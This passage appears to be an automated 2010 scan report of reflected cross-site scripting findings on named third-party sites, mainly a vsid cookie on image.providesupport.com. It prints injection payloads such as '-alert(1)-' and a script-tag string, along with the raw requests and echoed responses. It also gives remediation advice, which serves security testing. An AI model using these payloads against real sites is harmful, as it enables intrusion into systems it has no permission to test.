Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 03:23:19 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1006

({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "BMX_G": '0', "ar_p70821733": 'exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov
...[SNIP]...
Oct 30 01:41:28 2010&prad=48493791&arc=37093140&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&7d39c<script>alert(1)</script>9d09c880b4a', "BMX_3PC": '1', "BMX_BR": 'pid=p76910469&prad=50021&arc=521&exp=1292110859', "ar_70821733": 'exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu000033
...[SNIP]...

3.75. http://image.providesupport.com/js/valera/safe-standard.js [vsid cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/valera/safe-standard.js

Issue detail

The value of the vsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19ae4"-alert(1)-"56c191aaa46 was submitted in the vsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/valera/safe-standard.js HTTP/1.1
Host: image.providesupport.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: vsid=HFU500OBaLl219ae4"-alert(1)-"56c191aaa46;

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 5218
Date: Sun, 12 Dec 2010 03:23:34 GMT
Connection: close

var ps_valera_sid = "HFU500OBaLl219ae4"-alert(1)-"56c191aaa46";
// safe-standard@ie5up.js

var ps_valera_iso;
try {
   ps_valera_iso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.ps_valera_wid != null);
} catch(e) {
   ps_valera_iso = false;
}
...[SNIP]...

Report generated by XSS.CX at Sun Dec 12 08:17:00 CST 2010.